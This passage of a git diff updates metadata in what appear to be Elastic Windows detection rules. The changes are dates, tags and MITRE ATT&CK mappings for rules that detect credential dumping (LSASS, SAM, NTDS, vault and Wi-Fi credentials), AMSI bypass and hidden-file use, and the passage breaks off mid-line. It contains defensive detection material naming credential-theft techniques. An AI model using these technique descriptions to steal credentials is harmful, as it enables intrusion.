+[[rule.threat.technique]] +id = "T1187" +name = "Forced Authentication" +reference = "https://attack.mitre.org/techniques/T1187/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" -[[rule.threat.technique.subtechnique]] -id = "T1218.011" -name = "Rundll32" -reference = "https://attack.mitre.org/techniques/T1218/011/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/credential_access_remote_sam_secretsdump.toml b/rules/windows/credential_access_remote_sam_secretsdump.toml index f3fde2b0828..96822ab9c0a 100644 --- a/rules/windows/credential_access_remote_sam_secretsdump.toml +++ b/rules/windows/credential_access_remote_sam_secretsdump.toml @@ -2,7 +2,7 @@ creation_date = "2022/03/01" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,15 +67,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Resources: Investigation Guide", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" @@ -89,31 +81,18 @@ file where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" reference = "https://attack.mitre.org/techniques/T1003/002/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/credential_access_saved_creds_vault_winlog.toml b/rules/windows/credential_access_saved_creds_vault_winlog.toml index 2b62541ede2..6435dd1f66a 100644 --- a/rules/windows/credential_access_saved_creds_vault_winlog.toml +++ b/rules/windows/credential_access_saved_creds_vault_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,24 +87,18 @@ sequence by winlog.computer_name, winlog.process.pid with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.004" name = "Windows Credential Manager" reference = "https://attack.mitre.org/techniques/T1555/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_saved_creds_vaultcmd.toml b/rules/windows/credential_access_saved_creds_vaultcmd.toml index bcb205d1e7a..7e05143b527 100644 --- a/rules/windows/credential_access_saved_creds_vaultcmd.toml +++ b/rules/windows/credential_access_saved_creds_vaultcmd.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -94,24 +94,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.004" name = "Windows Credential Manager" reference = "https://attack.mitre.org/techniques/T1555/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml b/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml index 6746281b95d..93a9e7334eb 100644 --- a/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml +++ b/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/27" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,17 +75,7 @@ Audit Authorization Policy Change (Success,Failure) ``` """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Persistence", - "Data Source: Active Directory", - "Resources: Investigation Guide", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "query" @@ -96,26 +86,26 @@ event.code:4704 and host.os.type:"windows" and winlog.event_data.PrivilegeList:" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1558" -name = "Steal or Forge Kerberos Tickets" -reference = "https://attack.mitre.org/techniques/T1558/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/credential_access_shadow_credentials.toml b/rules/windows/credential_access_shadow_credentials.toml index f2acb0609bf..8d7dfb8c6b0 100644 --- a/rules/windows/credential_access_shadow_credentials.toml +++ b/rules/windows/credential_access_shadow_credentials.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,16 +85,7 @@ Set-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType W ``` """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Active Directory", - "Resources: Investigation Guide", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "query" @@ -107,14 +98,26 @@ event.code:"5136" and host.os.type:"windows" and winlog.event_data.AttributeLDAP [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/credential_access_spn_attribute_modified.toml b/rules/windows/credential_access_spn_attribute_modified.toml index f7b5e02f1bd..756dc3f5d77 100644 --- a/rules/windows/credential_access_spn_attribute_modified.toml +++ b/rules/windows/credential_access_spn_attribute_modified.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/22" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,16 +84,7 @@ Set-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType W ``` """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Active Directory", - "Resources: Investigation Guide", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "query" @@ -106,19 +97,13 @@ event.code:5136 and host.os.type:"windows" and winlog.event_data.OperationType:" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1558" -name = "Steal or Forge Kerberos Tickets" -reference = "https://attack.mitre.org/techniques/T1558/" -[[rule.threat.technique.subtechnique]] -id = "T1558.003" -name = "Kerberoasting" -reference = "https://attack.mitre.org/techniques/T1558/003/" - +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/credential_access_suspicious_lsass_access_memdump.toml b/rules/windows/credential_access_suspicious_lsass_access_memdump.toml index 53f21c1ebca..94f860c2038 100644 --- a/rules/windows/credential_access_suspicious_lsass_access_memdump.toml +++ b/rules/windows/credential_access_suspicious_lsass_access_memdump.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/07" integration = ["windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -96,31 +96,18 @@ process where host.os.type == "windows" and event.code == "10" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml b/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml index e63eabdab29..5fe01b915f7 100644 --- a/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml +++ b/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/16" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,17 +82,7 @@ Special Logon (Success) ``` """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Active Directory", "Data Source: Windows Security Event Logs"] type = "eql" query = ''' @@ -108,36 +98,18 @@ sequence by winlog.computer_name, winlog.event_data.SubjectLogonId with maxspan= [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" reference = "https://attack.mitre.org/techniques/T1003/002/" -[[rule.threat.technique.subtechnique]] -id = "T1003.004" -name = "LSA Secrets" -reference = "https://attack.mitre.org/techniques/T1003/004/" - - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml b/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml index a019bfa0a69..0e658d8cb0b 100644 --- a/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml +++ b/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml @@ -2,7 +2,7 @@ creation_date = "2021/12/25" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -93,20 +93,7 @@ This event will only trigger if symbolic links are created from a new process sp Direct access to a shell and calling symbolic link creation tools will not generate an event matching this rule. """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -124,24 +111,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1003.002" -name = "Security Account Manager" -reference = "https://attack.mitre.org/techniques/T1003/002/" - -[[rule.threat.technique.subtechnique]] -id = "T1003.003" -name = "NTDS" -reference = "https://attack.mitre.org/techniques/T1003/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1006" +name = "Direct Volume Access" +reference = "https://attack.mitre.org/techniques/T1006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/credential_access_veeam_backup_dll_imageload.toml b/rules/windows/credential_access_veeam_backup_dll_imageload.toml index 0af9521613a..a78053119d7 100644 --- a/rules/windows/credential_access_veeam_backup_dll_imageload.toml +++ b/rules/windows/credential_access_veeam_backup_dll_imageload.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -77,36 +77,13 @@ Veeam Backup software is crucial for data protection, enabling secure backup and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/credential_access_veeam_commands.toml b/rules/windows/credential_access_veeam_commands.toml index 26d95dd353c..b6b0c4da319 100644 --- a/rules/windows/credential_access_veeam_commands.toml +++ b/rules/windows/credential_access_veeam_commands.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/14" integration = ["windows", "endpoint", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,21 +64,7 @@ references = ["https://thedfirreport.com/2021/12/13/diavol-ransomware/"] risk_score = 47 rule_id = "b661f86d-1c23-4ce7-a59e-2edbdba28247" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Credential Access", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -94,36 +80,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/credential_access_wbadmin_ntds.toml b/rules/windows/credential_access_wbadmin_ntds.toml index d8e4b5920ef..159f6ad96c9 100644 --- a/rules/windows/credential_access_wbadmin_ntds.toml +++ b/rules/windows/credential_access_wbadmin_ntds.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/05" integration = ["windows", "endpoint", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,36 +89,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1003.002" -name = "Security Account Manager" -reference = "https://attack.mitre.org/techniques/T1003/002/" [[rule.threat.technique.subtechnique]] id = "T1003.003" name = "NTDS" reference = "https://attack.mitre.org/techniques/T1003/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1006" -name = "Direct Volume Access" -reference = "https://attack.mitre.org/techniques/T1006/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/credential_access_web_config_file_access.toml b/rules/windows/credential_access_web_config_file_access.toml index e8bd3d77a6c..f4cc7db11aa 100644 --- a/rules/windows/credential_access_web_config_file_access.toml +++ b/rules/windows/credential_access_web_config_file_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,14 +55,7 @@ references = [ risk_score = 73 rule_id = "5841b80f-a1f8-4c00-a966-d2cc4a7a82e4" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -79,18 +72,34 @@ event.category:file and host.os.type:windows and event.action:open and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable", "user.id"] diff --git a/rules/windows/credential_access_wireless_creds_dumping.toml b/rules/windows/credential_access_wireless_creds_dumping.toml index fb71341678b..92be7b8f51b 100644 --- a/rules/windows/credential_access_wireless_creds_dumping.toml +++ b/rules/windows/credential_access_wireless_creds_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/01" integration = ["endpoint", "system", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -96,21 +96,7 @@ references = [ risk_score = 73 rule_id = "2de87d72-ee0c-43e2-b975-5f0b029ac600" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Discovery", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -123,31 +109,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" - - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml b/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml index ab0b32e27a3..c6f704addd6 100644 --- a/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml +++ b/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -104,21 +104,7 @@ This rule looks for the execution of the `attrib.exe` utility with a command lin risk_score = 21 rule_id = "4630d948-40d4-4cef-ac69-4002e29bc3db" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timeline_id = "e70679c2-6cde-4510-9764-4823df18f7db" timeline_title = "Comprehensive Process Timeline" timestamp_override = "event.ingested" @@ -140,36 +126,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1222" -name = "File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/" -[[rule.threat.technique.subtechnique]] -id = "T1222.001" -name = "Windows File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/001/" - [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" + [[rule.threat.technique.subtechnique]] id = "T1564.001" name = "Hidden Files and Directories" reference = "https://attack.mitre.org/techniques/T1564/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/defense_evasion_amsi_bypass_powershell.toml b/rules/windows/defense_evasion_amsi_bypass_powershell.toml index f239ebb7b8f..e158e20003b 100644 --- a/rules/windows/defense_evasion_amsi_bypass_powershell.toml +++ b/rules/windows/defense_evasion_amsi_bypass_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/17" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -132,39 +132,21 @@ event.category:"process" and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_audit_policy_disabled_winlog.toml b/rules/windows/defense_evasion_audit_policy_disabled_winlog.toml index b3493761554..c3b090952e3 100644 --- a/rules/windows/defense_evasion_audit_policy_disabled_winlog.toml +++ b/rules/windows/defense_evasion_audit_policy_disabled_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/14" integration = ["windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = 